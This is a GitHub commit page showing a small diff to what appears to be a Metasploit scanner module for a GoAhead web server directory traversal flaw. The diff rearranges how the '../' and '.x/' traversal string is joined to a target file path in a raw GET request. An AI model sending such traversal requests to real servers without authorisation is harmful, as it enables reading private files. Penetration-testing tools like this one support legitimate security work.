We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 441042e commit dc14c77Copy full SHA for dc14c77
modules/auxiliary/scanner/http/goahead_traversal.rb
@@ -42,13 +42,13 @@ def initialize(info = {})
42
end
43
44
def run_host(ip)
45
- traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH']
46
filename = datastore['FILEPATH']
47
filename = filename[1, filename.length] if filename =~ /^\//
+ traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH'] << filename
48
49
res = send_request_raw({
50
'method' => 'GET',
51
- 'uri' => "#{traversal}#{filename}"
+ 'uri' => "#{traversal}"
52
})
53
54
if res &&
0 commit comments